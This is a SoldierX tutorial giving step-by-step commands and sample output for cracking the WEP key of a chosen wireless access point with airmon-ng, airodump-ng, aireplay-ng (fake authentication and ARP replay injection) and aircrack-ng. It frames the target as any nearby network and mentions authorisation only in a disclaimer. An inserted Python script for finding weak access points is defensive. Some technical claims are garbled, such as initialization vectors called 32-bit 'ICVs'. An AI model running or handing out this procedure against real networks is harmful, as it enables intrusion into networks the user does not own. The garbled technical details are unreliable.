Cracking WEP with the aircrack-ng suite

Prerequisites: 

Linux CMD experience
Backtrack 4 R2 or Ubuntu 7.10 + patched WiFi Drivers + Aircrack-ng suite
common sense

The information in this tutorial is for educational and informational purposes only; use it at your own risk. Soldierx.com, its members, crew, and affiliates cannot be held responsible for the misuse of this information.

WEP encryption has been hailed as one of the least secure methods of securing a wireless access point in the history of WiFi. The main reason for this is that fragments of the key are sent between a client computer and the access point in 32-bit initialization vectors, commonly referred to as ICVs. Statistically it has been shown that a certain volume of these have weak encryption and are vulnerable to packet analysis. The number of packets required to crack an access point's key can vary from 200 to 500 thousand for 64 and 128 bit encryption respectively.

***NOTE***
**This tutorial will cover a basic WEP crack.
**It is by no means exhaustive and is meant as
**a jumping-off point; from here I send you to Google,
**the place where I first got my information.
**********

***ALL COMMANDS LISTED IN THIS TUTORIAL ARE BEING RUN FROM THE root ACCOUNT ON THE MACHINE. IF YOU ARE NOT RUNNING BACKTRACK, OR YOU BUILT YOUR OWN SYSTEM, YOU NEED TO LOG IN AS ROOT OR sudo EACH COMMAND***

The first step in any cracker's attempt at a WiFi access point is to pick a target. This can be achieved by running airmon-ng to list any and all available network adapters.

 Interface       Chipset         Driver
 
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Then run airmon-ng start (adapter name: ath0, wlan0, wlan1, etc.). This puts your wireless adapter into promiscuous or monitor mode, which allows it to accept all traffic and basically grab ARP packets and such out of the air; it also allows the adapter to do what is called packet injection, basically shooting packets into the network to get a response from the access point.

The next command to run is airodump-ng (adapter name: mon0, mon1, eth0, etc.). This will list all available access points and let you choose one. You will want to pick the one with the best signal. To check the signal, look at the PWR column while the program is running. A strong signal will be a low number preceded by a dash (-), such as -56 or -86. The first example would be the stronger one, as I believe the strength is measured in -dBm, the power ratio in decibels (dB) of the measured power referenced to one milliwatt; the lower number is stronger because it is closer to a positive power output.

 CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy

 BSSID              STATION            PWR  Lost  Packets  Probes

 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782

Once you have selected your target, make note of the BSSID, channel, and the amount of data it receives. Another good indicator of a good access point to crack would be a reasonable amount of data received (80-120 without injection; it can be more). You would then run the command airodump-ng -w filename --channel (channel of target) --bssid (BSSID or MAC address of target) (interface to capture on: mon0, eth0, or whatever airmon-ng gives you as the monitor mode interface, typically mon0).

Example:

airodump-ng -w output --channel 9 --bssid 00:14:6C:7E:40:80 ath0
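As an added example that is not part of the original tutorial, here is a small Python script an administrator can run over a saved airodump-ng screen (the layout shown above) to list every access point that is still using WEP or no encryption at all, so they can be found and moved to WPA2. The sample screen embedded in it is constructed, not a real capture.

```python
import re
from dataclasses import dataclass
# Constructed airodump-ng screen (not a real capture); columns follow the layout in the
# tutorial: BSSID PWR RXQ Beacons #Data #/s CH MB ENC CIPHER AUTH ESSID
SAMPLE_SCREEN = """\
 CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy
 00:11:22:33:44:55  -61  90      812       43    0   6  54  WPA2 CCMP   PSK  office-net
 00:AA:BB:CC:DD:EE  -78  40      120        7    0  11  54  OPN              guest
 BSSID              STATION            PWR  Lost  Packets  Probes
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782
"""

# Matches one access-point row; station rows do not match because their second
# column is a MAC address rather than a signed integer.
AP_ROW = re.compile(
    r"^\s*(?P<bssid>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})\s+(?P<pwr>-?\d+)\s+\d+\s+\d+\s+"
    r"\d+\s+(?P<rate>\d+)\s+(?P<ch>\d+)\s+\S+\s+(?P<enc>\S+)\s*(?P<rest>.*)$"
)
@dataclass
class AccessPoint:
    bssid: str
    essid: str
    enc: str
    power: int         # PWR column as airodump-ng prints it
    channel: int
    data_per_sec: int  # the #/s column

def parse_airodump(screen: str) -> list:
    """Parse the access-point table out of an airodump-ng screen dump."""
    aps = []
    for line in screen.splitlines():
        m = AP_ROW.match(line)
        if not m:
            continue
        # CIPHER and AUTH may be blank, so the ESSID is taken as the last token
        # (ESSIDs with spaces are not handled in this short example).
        rest = m.group("rest").split()
        aps.append(AccessPoint(m.group("bssid"), rest[-1] if rest else "", m.group("enc"),
                               int(m.group("pwr")), int(m.group("ch")), int(m.group("rate"))))
    return aps

def weak_access_points(aps: list) -> list:
    """Access points an administrator should re-key: WEP (breakable as shown above) or open."""
    return [ap for ap in aps if ap.enc in ("WEP", "OPN")]

if __name__ == "__main__":
    for ap in weak_access_points(parse_airodump(SAMPLE_SCREEN)):
        print(f"{ap.bssid}  ch {ap.channel:>2}  {ap.enc:<4}  {ap.essid}")
```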

At this stage you would then open a tab in your console window for a separate session and run aireplay-ng -1 0 -a (bssid of target) (interface). This is a fake authentication attack and will give you something like this:

18:18:20  Sending Authentication Request
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Association successful :-)

That output means the fake authentication succeeded. Once you have achieved a successful association, run the injection to gather data. (You want to run this alongside airodump-ng, because airodump-ng captures and dumps packets to a .cap file that you will be running through aircrack-ng.) To start the attack, run aireplay-ng -3 -b (bssid of target) (interface). This command starts an ARP request replay attack, which stimulates the gathering of the data you need to crack the access point.

Example:

aireplay-ng -3 -b 00:14:6C:7E:40:80 ath0

You should see this:

Saving ARP requests in replay_arp-0321-191525.cap
 You should also start airodump-ng to capture replies.
 Read 629399 packets (got 316283 ARP requests), sent 210955 packets...

Open another console window, a third one, and enter aircrack-ng filename.cap. aircrack-ng will attempt a crack with what you have captured, and if it does not succeed it will monitor the amount of data you have received and continue trying to crack the key at regular intervals. Once the crack has succeeded you will know it by a screen like this:

                                              Aircrack-ng 0.9


                              [00:03:06] Tested 674449 keys (got 96610 IVs)

 KB    depth   byte(vote)
  0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0)
  1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12)
  2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10)
  3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15)

                       KEY FOUND! [ 12:34:56:78:90 ]
      Probability: 100%

This screen lets you know that you have successfully cracked the key, and you can copy it down to use or test. You can back up the .cap files to a flash drive and crack at a later date if you lose the key, though if the access point's key changes you may have to crack it again.

This is all you really need to know to crack a WEP encrypted access point.